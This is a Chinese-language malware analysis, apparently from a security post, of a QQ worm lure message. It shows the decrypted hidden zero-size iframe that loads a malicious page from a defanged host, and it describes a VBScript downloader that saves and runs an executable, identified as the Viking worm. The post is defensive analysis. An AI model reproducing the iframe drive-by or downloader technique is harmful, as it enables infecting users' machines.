QQ自动发送的信息为:
/--------
看看我最近的照片~~~ 才扫描到Q-Zone空间上的。是不是有点太露了....
hxxp://Q-Zone.***QQ.C0M.%34%76%30***%2E%63%6E/**Photo/Cgi_Bin&387**381/
--------/
点击该链接打开的网页首部有用自定义函数 psw()加密的JavaScript脚本代码。解密后为:
/-------- <iframe src=hxxp://web***1.39***com.org/m***s/mm***.htm width=0 height=0></iframe> --------/
mm***.htm 的开头为 HTMLShip 加密的脚本程序,分为两个部分:
前一部分 解密后的代码为JavaScript编写,解密后的代码如下:
/-------- <script language=javascript>yS6=5633;if(document.all){function _dm(){return false};function _mdm(){document.oncontextmenu=_dm;setTimeout("_mdm()",800)};_mdm();}document.oncontextmenu=new Function("return false");function _ndm(e){if(document.layers||window.sidebar){if(e.which!=1)return false;}};if(document.layers){document.captureEvents(Event.MOUSEDOWN);document.onmousedown=_ndm;}else{document.onmouseup=_ndm;};oK74=3345;dI39=7346;function _dws(){window.status = "The page is protected by HTMLShip XP";setTimeout("_dws()",100);};_dws();kY53=6773;jQ9=4206;function _dds(){if(document.all){document.onselectstart=function (){return false};setTimeout("_dds()",700)}};_dds();iD69=5348;kH81=489;aS87=3348;mY34=4488;lL93=5630;bI58=9632;sT64=2490;;_licensed_to_="TEAM";</script><html> --------/
后一部分 使用的是VBScript,其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 把 hxxp://web***1.3***9com.org/m***s/mm***1.exe 保存为 %temp%/g0ld.com,并利用Shell.Application 对象 的 ShellExecute 方法来运行。
Kaspersky 报为 Worm.Win32.Viking.y( http://www.viruslist.com/en/find?words=Worm.Win32.Viking.y)
瑞星报为 Worm.Viking.cx。
